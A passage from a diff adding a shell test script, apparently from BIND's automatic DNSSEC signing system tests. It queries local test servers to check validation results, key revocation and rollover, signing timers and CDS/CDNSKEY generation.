+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth a.secure.optout.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking multi-stage positive validation OPTOUT/NSEC3 ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.nsec3.optout.example. \
+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth a.nsec3.optout.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking multi-stage positive validation OPTOUT/OPTOUT ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.optout.optout.example. \
+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth a.optout.optout.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking empty NODATA OPTOUT ($n)"
+ret=0
+$DIG $DIGOPTS +noauth empty.optout.example. \
+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth empty.optout.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+#grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+# Check the insecure.secure.example domain (insecurity proof)
+
+echo_i "checking 2-server insecurity proof ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.insecure.secure.example. @10.53.0.2 a \
+ > dig.out.ns2.test$n || ret=1
+$DIG $DIGOPTS +noauth a.insecure.secure.example. @10.53.0.4 a \
+ > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - this is looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+# Check a negative response in insecure.secure.example
+
+echo_i "checking 2-server insecurity proof with a negative answer ($n)"
+ret=0
+$DIG $DIGOPTS q.insecure.secure.example. @10.53.0.2 a > dig.out.ns2.test$n \
+ || ret=1
+$DIG $DIGOPTS q.insecure.secure.example. @10.53.0.4 a > dig.out.ns4.test$n \
+ || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - this is looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking security root query ($n)"
+ret=0
+$DIG $DIGOPTS . @10.53.0.4 key > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking positive validation RSASHA256 NSEC ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.rsasha256.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth a.rsasha256.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking positive validation RSASHA512 NSEC ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.rsasha512.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth a.rsasha512.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking that positive validation in a privately secure zone works ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.private.secure.example. a @10.53.0.2 \
+ > dig.out.ns2.test$n || ret=1
+$DIG $DIGOPTS +noauth a.private.secure.example. a @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking that negative validation in a privately secure zone works ($n)"
+ret=0
+$DIG $DIGOPTS +noauth q.private.secure.example. a @10.53.0.2 \
+ > dig.out.ns2.test$n || ret=1
+$DIG $DIGOPTS +noauth q.private.secure.example. a @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1
+# Note - this is looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking privately secure to nxdomain works ($n)"
+ret=0
+$DIG $DIGOPTS +noauth private2secure-nxdomain.private.secure.example. SOA @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+# Try validating with a revoked trusted key.
+# This should fail.
+
+echo_i "checking that validation returns insecure due to revoked trusted key ($n)"
+ret=0
+$DIG $DIGOPTS example. soa @10.53.0.5 > dig.out.ns5.test$n || ret=1
+grep "flags:.*; QUERY" dig.out.ns5.test$n > /dev/null || ret=1
+grep "flags:.* ad.*; QUERY" dig.out.ns5.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking that revoked key is present ($n)"
+ret=0
+id=$(cat rev.key)
+$DIG $DIGOPTS +multi dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep '; key id = '"$id"'$' dig.out.ns1.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking that revoked key self-signs ($n)"
+ret=0
+id=$(cat rev.key)
+$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep 'RRSIG.*'" $id "'\. ' dig.out.ns1.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking for unpublished key ($n)"
+ret=0
+id=$(keyfile_to_key_id "$(cat unpub.key)")
+$DIG $DIGOPTS +multi dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep '; key id = '"$id"'$' dig.out.ns1.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking for activated but unpublished key ($n)"
+ret=0
+id=$(keyfile_to_key_id "$(cat activate-now-publish-1day.key)")
+$DIG $DIGOPTS +multi dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep '; key id = '"$id"'$' dig.out.ns1.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking that standby key does not sign records ($n)"
+ret=0
+id=$(keyfile_to_key_id "$(cat standby.key)")
+$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep 'RRSIG.*'" $id "'\. ' dig.out.ns1.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking that deactivated key does not sign records ($n)"
+ret=0
+id=$(keyfile_to_key_id "$(cat inact.key)")
+$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep 'RRSIG.*'" $id "'\. ' dig.out.ns1.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking insertion of public-only key ($n)"
+ret=0
+id=$(keyfile_to_key_id "$(cat nopriv.key)")
+file="ns1/$(cat nopriv.key).key"
+keydata=$(grep DNSKEY $file)
+$NSUPDATE > /dev/null 2>&1 <<END || status=1
+server 10.53.0.1 ${PORT}
+zone .
+ttl 3600
+update add $keydata
+send
+END
+sleep 1
+$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep 'RRSIG.*'" $id "'\. ' dig.out.ns1.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking key deletion ($n)"
+ret=0
+id=$(keyfile_to_key_id "$(cat del.key)")
+$DIG $DIGOPTS +multi dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep '; key id = '"$id"'$' dig.out.ns1.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking secure-to-insecure transition, nsupdate ($n)"
+ret=0
+$NSUPDATE > /dev/null 2>&1 <<END || status=1
+server 10.53.0.3 ${PORT}
+zone secure-to-insecure.example
+update delete secure-to-insecure.example dnskey
+send
+END
+for i in 0 1 2 3 4 5 6 7 8 9; do
+ ret=0
+ $DIG $DIGOPTS axfr secure-to-insecure.example @10.53.0.3 > dig.out.ns3.test$n || ret=1
+ grep -E '(RRSIG|DNSKEY|NSEC)' dig.out.ns3.test$n > /dev/null && ret=1
+ [ $ret -eq 0 ] && break
+ echo_i "waiting ... ($i)"
+ sleep 2
+done
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking secure-to-insecure transition, scheduled ($n)"
+ret=0
+file="ns3/$(cat del1.key).key"
+$SETTIME -I now -D now $file > settime.out.test$n.1 || ret=1
+file="ns3/$(cat del2.key).key"
+$SETTIME -I now -D now $file > settime.out.test$n.2 || ret=1
+($RNDCCMD 10.53.0.3 sign secure-to-insecure2.example. 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1
+for i in 0 1 2 3 4 5 6 7 8 9; do
+ ret=0
+ $DIG $DIGOPTS axfr secure-to-insecure2.example @10.53.0.3 > dig.out.ns3.test$n || ret=1
+ grep -E '(RRSIG|DNSKEY|NSEC3)' dig.out.ns3.test$n > /dev/null && ret=1
+ [ $ret -eq 0 ] && break
+ echo_i "waiting ... ($i)"
+ sleep 2
+done
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking jitter in a newly signed NSEC3 zone ($n)"
+ret=0
+# Use DNS UPDATE to add an NSEC3PARAM record into the zone.
+$NSUPDATE > nsupdate.out.test$n 2>&1 <<END || ret=1
+server 10.53.0.3 ${PORT}
+zone jitter.nsec3.example.
+update add jitter.nsec3.example. 3600 NSEC3PARAM 1 0 10 BEEF
+send
+END
+[ $ret != 0 ] && echo_i "error: dynamic update add NSEC3PARAM failed"
+# Create DNSSEC keys in the zone directory.
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -K ns3 jitter.nsec3.example > /dev/null
+# Trigger zone signing.
+($RNDCCMD 10.53.0.3 sign jitter.nsec3.example. 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1
+# Wait until zone has been signed.
+check_if_nsec3param_exists() {
+ $DIG $DIGOPTS NSEC3PARAM jitter.nsec3.example @10.53.0.3 > dig.out.ns3.1.test$n || return 1
+ grep -q "^jitter\.nsec3\.example\..*NSEC3PARAM" dig.out.ns3.1.test$n || return 1
+}
+retry_quiet 40 check_if_nsec3param_exists || {
+ echo_i "error: NSEC3PARAM not present yet"
+ ret=1
+}
+$DIG $DIGOPTS AXFR jitter.nsec3.example @10.53.0.3 > dig.out.ns3.2.test$n || ret=1
+# Check jitter distribution.
+checkjitter dig.out.ns3.2.test$n || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking that serial number and RRSIGs are both updated (rt21045) ($n)"
+ret=0
+oldserial=$($DIG $DIGOPTS +short soa prepub.example @10.53.0.3 | awk '$0 !~ /SOA/ {print $3}')
+oldinception=$($DIG $DIGOPTS +short soa prepub.example @10.53.0.3 | awk '/SOA/ {print $6}' | sort -u)
+
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q -K ns3 -P 0 -A +6d -I +38d -D +45d prepub.example > /dev/null
+
+($RNDCCMD 10.53.0.3 sign prepub.example 2>&1 | sed 's/^/ns1 /' | cat_i) || ret=1
+newserial=$oldserial
+try=0
+while [ $oldserial -eq $newserial -a $try -lt 42 ]
+do
+ newserial=$($DIG $DIGOPTS +short soa prepub.example @10.53.0.3 |
+ awk '$0 !~ /SOA/ {print $3}')
+ sleep 1
+ try=$((try + 1))
+done
+newinception=$($DIG $DIGOPTS +short soa prepub.example @10.53.0.3 | awk '/SOA/ {print $6}' | sort -u)
+#echo "$oldserial : $newserial"
+#echo "$oldinception : $newinception"
+
+[ "$oldserial" = "$newserial" ] && ret=1
+[ "$oldinception" = "$newinception" ] && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "preparing to test key change corner cases"
+echo_i "removing a private key file"
+file="ns1/$(cat vanishing.key).private"
+rm -f $file
+
+echo_i "preparing ZSK roll"
+starttime=$($PERL -e 'print time(), "\n";')
+oldfile=$(cat active.key)
+oldid=$(keyfile_to_key_id "$(cat active.key)")
+newfile=$(cat standby.key)
+newid=$(keyfile_to_key_id "$(cat standby.key)")
+$SETTIME -K ns1 -I now+2s -D now+25 $oldfile > settime.out.test$n.1 || ret=1
+$SETTIME -K ns1 -i 0 -S $oldfile $newfile > settime.out.test$n.2 || ret=1
+
+# note previous zone serial number
+oldserial=$($DIG $DIGOPTS +short soa . @10.53.0.1 | awk '{print $3}')
+
+($RNDCCMD 10.53.0.1 loadkeys . 2>&1 | sed 's/^/ns1 /' | cat_i) || ret=1
+sleep 4
+
+echo_i "revoking key to duplicated key ID"
+$SETTIME -R now -K ns2 Kbar.+013+59973.key > settime.out.test$n.3 || ret=1
+
+($RNDCCMD 10.53.0.2 loadkeys bar. 2>&1 | sed 's/^/ns2 /' | cat_i) || ret=1
+
+echo_i "waiting for changes to take effect"
+sleep 5
+
+echo_i "checking former standby key $newid is now active ($n)"
+ret=0
+$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep 'RRSIG.*'" $newid "'\. ' dig.out.ns1.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking former standby key has only signed incrementally ($n)"
+ret=0
+$DIG $DIGOPTS txt . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep 'RRSIG.*'" $newid "'\. ' dig.out.ns1.test$n > /dev/null && ret=1
+grep 'RRSIG.*'" $oldid "'\. ' dig.out.ns1.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking that signing records have been marked as complete ($n)"
+ret=0
+checkprivate . 10.53.0.1 || ret=1
+checkprivate bar 10.53.0.2 || ret=1
+checkprivate example 10.53.0.2 || ret=1
+checkprivate private.secure.example 10.53.0.3 || ret=1
+checkprivate nsec3.example 10.53.0.3 || ret=1
+checkprivate nsec3.nsec3.example 10.53.0.3 || ret=1
+checkprivate nsec3.optout.example 10.53.0.3 || ret=1
+checkprivate nsec3-to-nsec.example 10.53.0.3 || ret=1
+if $SHELL ../testcrypto.sh -q RSASHA1
+then
+ checkprivate nsec-only.example 10.53.0.3 || ret=1
+fi
+checkprivate oldsigs.example 10.53.0.3 || ret=1
+checkprivate optout.example 10.53.0.3 || ret=1
+checkprivate optout.nsec3.example 10.53.0.3 || ret=1
+checkprivate optout.optout.example 10.53.0.3 || ret=1
+checkprivate prepub.example 10.53.0.3 1 || ret=1
+checkprivate rsasha256.example 10.53.0.3 || ret=1
+checkprivate rsasha512.example 10.53.0.3 || ret=1
+checkprivate secure.example 10.53.0.3 || ret=1
+checkprivate secure.nsec3.example 10.53.0.3 || ret=1
+checkprivate secure.optout.example 10.53.0.3 || ret=1
+checkprivate secure-to-insecure2.example 10.53.0.3 || ret=1
+checkprivate secure-to-insecure.example 10.53.0.3 || ret=1
+checkprivate ttl1.example 10.53.0.3 || ret=1
+checkprivate ttl2.example 10.53.0.3 || ret=1
+checkprivate ttl3.example 10.53.0.3 || ret=1
+checkprivate ttl4.example 10.53.0.3 || ret=1
+n=$((n + 1))
+status=$((status + ret))
+
+echo_i "forcing full sign"
+($RNDCCMD 10.53.0.1 sign . 2>&1 | sed 's/^/ns1 /' | cat_i) || ret=1
+
+echo_i "waiting for change to take effect"
+sleep 5
+
+echo_i "checking former standby key has now signed fully ($n)"
+ret=0
+$DIG $DIGOPTS txt . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep 'RRSIG.*'" $newid "'\. ' dig.out.ns1.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking SOA serial number has been incremented ($n)"
+ret=0
+newserial=$($DIG $DIGOPTS +short soa . @10.53.0.1 | awk '{print $3}')
+[ "$newserial" != "$oldserial" ] || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking delayed key publication/activation ($n)"
+ret=0
+zsk=$(cat delayzsk.key)
+ksk=$(cat delayksk.key)
+# publication and activation times should be unset
+$SETTIME -K ns3 -pA -pP $zsk > settime.out.test$n.zsk || ret=1
+grep -v UNSET settime.out.test$n.zsk >/dev/null && ret=1
+$SETTIME -K ns3 -pA -pP $ksk > settime.out.test$n.ksk || ret=1
+grep -v UNSET settime.out.test$n.ksk >/dev/null && ret=1
+$DIG $DIGOPTS +noall +answer dnskey delay.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1
+# DNSKEY not expected:
+awk 'BEGIN {r=1} $4=="DNSKEY" {r=0} END {exit r}' dig.out.ns3.test$n && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking scheduled key publication, not activation ($n)"
+ret=0
+# Ensure initial zone is loaded.
+wait_for_notifies "delay.example" "ns3" || ret=1
+$SETTIME -K ns3 -P now+3s -A none $zsk > settime.out.test$n.zsk || ret=1
+$SETTIME -K ns3 -P now+3s -A none $ksk > settime.out.test$n.ksk || ret=1
+($RNDCCMD 10.53.0.3 loadkeys delay.example. 2>&1 | sed 's/^/ns2 /' | cat_i) || ret=1
+echo_i "waiting for changes to take effect"
+sleep 3
+wait_for_notifies "delay.example" "ns3" || ret=1
+
+$DIG $DIGOPTS +noall +answer dnskey delay.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1
+# DNSKEY expected:
+awk 'BEGIN {r=1} $4=="DNSKEY" {r=0} END {exit r}' dig.out.ns3.test$n || ret=1
+# RRSIG not expected:
+awk 'BEGIN {r=1} $4=="RRSIG" {r=0} END {exit r}' dig.out.ns3.test$n && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking scheduled key activation ($n)"
+ret=0
+$SETTIME -K ns3 -A now+3s $zsk > settime.out.test$n.zsk || ret=1
+$SETTIME -K ns3 -A now+3s $ksk > settime.out.test$n.ksk || ret=1
+($RNDCCMD 10.53.0.3 loadkeys delay.example. 2>&1 | sed 's/^/ns2 /' | cat_i) || ret=1
+echo_i "waiting for changes to take effect"
+sleep 3
+wait_for_log 10 "add delay\.example\..*NSEC.a\.delay\.example\. NS SOA RRSIG NSEC DNSKEY" ns3/named.run
+check_is_signed() {
+ $DIG $DIGOPTS +noall +answer dnskey delay.example. @10.53.0.3 > dig.out.ns3.1.test$n || return 1
+ # DNSKEY expected:
+ awk 'BEGIN {r=1} $4=="DNSKEY" {r=0} END {exit r}' dig.out.ns3.1.test$n || return 1
+ # RRSIG expected:
+ awk 'BEGIN {r=1} $4=="RRSIG" {r=0} END {exit r}' dig.out.ns3.1.test$n || return 1
+ $DIG $DIGOPTS +noall +answer a a.delay.example. @10.53.0.3 > dig.out.ns3.2.test$n || return 1
+ # A expected:
+ awk 'BEGIN {r=1} $4=="A" {r=0} END {exit r}' dig.out.ns3.2.test$n || return 1
+ # RRSIG expected:
+ awk 'BEGIN {r=1} $4=="RRSIG" {r=0} END {exit r}' dig.out.ns3.2.test$n || return 1
+ return 0
+}
+retry_quiet 5 check_is_signed || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking former active key was removed ($n)"
+#
+# Work out how long we need to sleep. Allow 4 seconds for the records
+# to be removed.
+#
+now=$($PERL -e 'print time(), "\n";')
+sleep=$((starttime + 29 - now))
+case $sleep in
+-*|0);;
+*) echo_i "waiting for timer to have activated"; sleep $sleep;;
+esac
+ret=0
+$DIG $DIGOPTS +multi dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep '; key id = '"$oldid"'$' dig.out.ns1.test$n > /dev/null && ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking private key file removal caused no immediate harm ($n)"
+ret=0
+id=$(keyfile_to_key_id "$(cat vanishing.key)")
+$DIG $DIGOPTS dnskey . @10.53.0.1 > dig.out.ns1.test$n || ret=1
+grep 'RRSIG.*'" $id "'\. ' dig.out.ns1.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking revoked key with duplicate key ID ($n)"
+ret=0
+id=59973
+rid=60101
+$DIG $DIGOPTS +multi dnskey bar @10.53.0.2 > dig.out.ns2.test$n || ret=1
+grep '; key id = '"$id"'$' dig.out.ns2.test$n > /dev/null && ret=1
+keys=$(grep '; key id = '"$rid"'$' dig.out.ns2.test$n | wc -l)
+test $keys -eq 2 || ret=1
+$DIG $DIGOPTS dnskey bar @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking key event timers are always set ($n)"
+ret=0
+# this is a regression test for a bug in which the next key event could
+# be scheduled for the present moment, and then never fire. check for
+# visible evidence of this error in the logs:
+awk '/next key event/ {if ($1 == $8 && $2 == $9) exit 1}' */named.run || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+# this confirms that key events are never scheduled more than
+# 'dnssec-loadkeys-interval' minutes in the future, and that the
+# event scheduled is within 10 seconds of expected interval.
+check_interval () {
+ awk '/next key event/ {print $2 ":" $9}' $1/named.run |
+ sed -e 's/\.//g' -e 's/:0\{1,4\}/:/g' |
+ awk -F: '
+ {
+ x = ($6+ $5*60000 + $4*3600000) - ($3+ $2*60000 + $1*3600000);
+ # abs(x) < 1000 ms treat as 'now'
+ if (x < 1000 && x > -1000)
+ x = 0;
+ # convert to seconds
+ x = x/1000;
+ # handle end of day roll over
+ if (x < 0)
+ x = x + 24*3600;
+ # handle log timestamp being a few milliseconds later
+ if (x != int(x))
+ x = int(x + 1);
+ if (int(x) > int(interval))
+ exit (1);
+ }
+ END { if (int(x) > int(interval) || int(x) < int(interval-10)) exit(1) }' interval=$2
+ return $?
+}
+
+echo_i "checking automatic key reloading interval ($n)"
+ret=0
+check_interval ns1 3600 || ret=1
+check_interval ns2 1800 || ret=1
+check_interval ns3 600 || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking for key reloading loops ($n)"
+ret=0
+# every key event should schedule a successor, so these should be equal
+rekey_calls=$(grep "reconfiguring zone keys" ns*/named.run | wc -l)
+rekey_events=$(grep "next key event" ns*/named.run | wc -l)
+[ "$rekey_calls" = "$rekey_events" ] || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "forcing full sign with unreadable keys ($n)"
+ret=0
+chmod 0 ns1/K.+*+*.key ns1/K.+*+*.private || ret=1
+($RNDCCMD 10.53.0.1 sign . 2>&1 | sed 's/^/ns1 /' | cat_i) || ret=1
+$DIG $DIGOPTS . @10.53.0.1 dnskey > dig.out.ns1.test$n || ret=1
+grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "test turning on auto-dnssec during reconfig ($n)"
+ret=0
+# first create a zone that doesn't have auto-dnssec
+($RNDCCMD 10.53.0.3 addzone reconf.example '{ type primary; file "reconf.example.db"; };' 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1
+rekey_calls=$(grep "zone reconf.example.*next key event" ns3/named.run | wc -l)
+[ "$rekey_calls" -eq 0 ] || ret=1
+# ...then we add auto-dnssec and reconfigure
+($RNDCCMD 10.53.0.3 modzone reconf.example '{ type primary; file "reconf.example.db"; allow-update { any; }; auto-dnssec maintain; };' 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1
+rndc_reconfig ns3 10.53.0.3
+for i in 0 1 2 3 4 5 6 7 8 9; do
+ lret=0
+ rekey_calls=$(grep "zone reconf.example.*next key event" ns3/named.run | wc -l)
+ [ "$rekey_calls" -gt 0 ] || lret=1
+ if [ "$lret" -eq 0 ]; then break; fi
+ echo_i "waiting ... ($i)"
+ sleep 1
+done
+n=$((n + 1))
+if [ "$lret" != 0 ]; then ret=$lret; fi
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "test CDS and CDNSKEY auto generation ($n)"
+ret=0
+$DIG $DIGOPTS @10.53.0.3 sync.example cds > dig.out.ns3.cdstest$n
+$DIG $DIGOPTS @10.53.0.3 sync.example cdnskey > dig.out.ns3.cdnskeytest$n
+grep -i "sync.example.*in.cds.*[1-9][0-9]* " dig.out.ns3.cdstest$n > /dev/null || ret=1
+grep -i "sync.example.*in.cdnskey.*257 " dig.out.ns3.cdnskeytest$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "test 'dnssec-dnskey-kskonly no' affects DNSKEY/CDS/CDNSKEY ($n)"
+ret=0
+$DIG $DIGOPTS @10.53.0.3 sync.example dnskey > dig.out.ns3.dnskeytest$n
+$DIG $DIGOPTS @10.53.0.3 sync.example cdnskey > dig.out.ns3.cdnskeytest$n
+$DIG $DIGOPTS @10.53.0.3 sync.example cds > dig.out.ns3.cdstest$n
+lines=$(awk '$4 == "RRSIG" && $5 == "DNSKEY" {print}' dig.out.ns3.dnskeytest$n | wc -l)
+test ${lines:-0} -eq 2 || ret=1
+lines=$(awk '$4 == "RRSIG" && $5 == "CDNSKEY" {print}' dig.out.ns3.cdnskeytest$n | wc -l)
+test ${lines:-0} -eq 2 || ret=1
+lines=$(awk '$4 == "RRSIG" && $5 == "CDS" {print}' dig.out.ns3.cdstest$n | wc -l)
+test ${lines:-0} -eq 2 || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "test 'dnssec-dnskey-kskonly yes' affects DNSKEY/CDS/CDNSKEY ($n)"
+ret=0
+$DIG $DIGOPTS @10.53.0.3 kskonly.example dnskey > dig.out.ns3.dnskeytest$n
+$DIG $DIGOPTS @10.53.0.3 kskonly.example cdnskey > dig.out.ns3.cdnskeytest$n
